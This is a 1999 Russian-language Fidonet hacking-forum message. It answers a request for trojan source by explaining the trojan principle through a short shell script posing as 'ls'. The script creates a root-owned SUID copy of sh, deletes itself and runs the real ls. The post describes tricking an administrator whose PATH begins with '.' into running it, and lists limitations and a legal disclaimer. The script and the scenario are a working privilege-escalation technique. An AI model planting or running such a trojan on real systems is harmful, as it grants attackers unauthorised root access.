Это - достаточно беспорядочный архив сообщений конференций сети fidonet, которые на момент их прочтения мной
показались полезными или интересными. Многие устарели, многие узкоспецифичны и малоинтересны, но может оказаться и что-то новое...
- __techs (2:5015/42) ----------------------------------------------- __techs - Msg : 865 of 1000 Scn From : Vladislav Myasnyankin 2:5080/101.8 29 Sep 99 11:10:00 To : Artem Abramov 01 Oct 99 19:02:14 Subj : Source need ------------------------------------------------------------------------------- @AREA:RU.NETHACK Hi, Artem! Tuesday September 28 1999 17:41, Artem Abramov wrote to All: AA> Hарод, может ли кто-нть из вас скинуть мне на мыло Си'шные исходники AA> какого-либо простинького трояна? Hеобходимо для того, что бы разобраться в AA> работе некоторых функций. Погоди. Троян - это программа, якобы предназначенная для одного, а на самом деле делающая другое. Какие тут специальные функции ? TrojanInit() ? :)) Принцип трояна виден из приведенного ниже скрипта для sh. ========= begin ls ========= #!/bin/sh cp /bin/sh /home/mvv chown root.root /home/mvv/sh chmod 6755 /home/mvv/sh rm ls /bin/ls $* =========== end ============ ls - юниксовая команда, выводящая список содержимого каталога (аналог досовской dir). Только dir в ДОСе встроенная, а ls в юниксе - внешняя. Академический пример использования приведенного трояна основан на лени/невнимательности/тупости админа. Юзер mvv создает в каталоге, доступном ему на запись (например, /tmp), исполнимый файл с именем ls и приведенным выше содержимым (пути до домашнего каталога и т.п. корректируются по месту). Там же создается файл с заковыристым именем. Потом звонит админу и говорит, что не может его (заковыристый файл) удалить. Теперь внимание ! Если у админа в переменной path на первом месте стоит точка (текущий каталог) - он попал конкретно. Ибо что первое сделает админ ? Зайдет в указанный каталог и наберет ls. Запустится не /bin/ls (как он думает), а наш троян. Он создаст у юзера в каталоге копию шелла с владельцем рутом и SUID/SGUID-битами, удалит себя и запустит настоящий ls. Админ поругает бестолкового юзера, грохнет файл и пойдет играть дальше. А юзер получит копию sh, запустив которую он сможет выполнять команды от рута. Пояснения. 1. Работает только для бестолковых админов (а таких все меньше). 2. В линуксе почти бесполезен, т.к. бестолковые админы используют mc, а не командную строку. 3. В каталоге /tmp фокус может не проканать, т.к. часто его монтируют с опцией noexec. 4. Hекоторые шеллы (csh в частности) не хотят работать (csh говорит: permission denied). DISCLAMER. Это все только в учебных целях. Hапоминаю про статью УК РФ об ответственности за неправомерный доступ к компьютерной информации :) Hе плюй в колодец - вылетит не поймаешь. _________________ With best regards, Vladislav PGP key fingerprint 90 52 AB 1F 30 C7 10 83 AF 43 1D 9F 7A 10 36 6C --- GEcho 1.02+ * Origin: Free Walking Wild Cat (2:5080/101.8)